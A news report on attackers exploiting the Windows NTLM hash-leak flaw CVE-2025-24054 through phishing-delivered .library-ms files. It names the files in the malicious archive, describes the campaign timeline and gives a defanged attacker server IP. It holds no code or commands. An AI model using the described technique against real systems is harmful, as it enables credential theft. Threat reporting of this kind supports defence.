A New Security Nightmare Unleashed Soon After Patch

A critical security vulnerability allowing hackers to siphon off NTLM authentication hashes has been actively exploited, just days after Microsoft rolled out a fix. Known as CVE-2025-24054, this flaw impacts Windows systems and can be triggered by merely engaging with a specially crafted .library-ms file.

How the Exploit Works

When a user interacts with the malicious file—such as by navigating to its folder—Windows unwittingly initiates an SMB authentication request, exposing the NTLMv2-SSP hash to an attacker's server.

Timeline of Terror: Exploit Before Patch Implementation

Although Microsoft patched the issue on March 11, 2025, cybercriminals began capitalizing on this vulnerability by March 19. Researchers quickly observed an organized campaign aimed at institutions in Poland and Romania.

The Phishing Scheme Unveiled

Attackers cleverly employed malicious .library-ms files disseminated through Dropbox links embedded in phishing emails. Once downloaded, these files executed the NTLM hash leakage without requiring users to open or run them.

Expert Insights on the Threat

"The documentation from Microsoft indicated that the flaw could be activated with minimal user interaction, such as right-clicking or merely browsing to the folder containing the harmful file," noted Check Point Research. Furthermore, this exploit seems to share connections with a previously patched vulnerability, CVE-2024-43451.

Coordinated Campaigns and Rising Threat Levels

The first known exploit of this vulnerability took place around March 20-21, using a compressed file named xd.zip. This archive included four malicious components specifically designed to extract NTLMv2 hashes:'

- **xd.library-ms**: Directly triggers CVE-2025-24054 to leak NTLMv2 hashes.

- **xd.url**: Linked to CVE-2024-43451, exploited via UNC path.

- **xd.website**: Utilizes UNC references to initiate SMB connections.

- **xd.lnk**: A shortcut that triggers hash leakage through SMB.

A Global Web of Malicious Activity

The SMB servers capturing these stolen credentials were traced back to various countries including Russia, Bulgaria, and Turkey. Notably, one such server, linked to IP address 159.196.128[.]120, had been previously flagged by HarfangLab for connections to APT28 (Fancy Bear), although a direct correlation to this campaign remains unconfirmed.

Surging Campaigns Detected

In the following days, Check Point Research identified about 10 more campaigns, with a particularly alarming wave surfacing by March 25. This iteration distributed unarchived .library-ms files that triggered NTLM hash leaks through minimal user interaction, raising the threat level significantly, especially for systems lacking SMB signing or NTLM relay protections.

Microsoft's Acknowledgment and Response

Recognizing the severity of this vulnerability, Microsoft issued a security patch on March 11, initially classified as CVE-2025-24071, but later corrected to its current designation, CVE-2025-24054.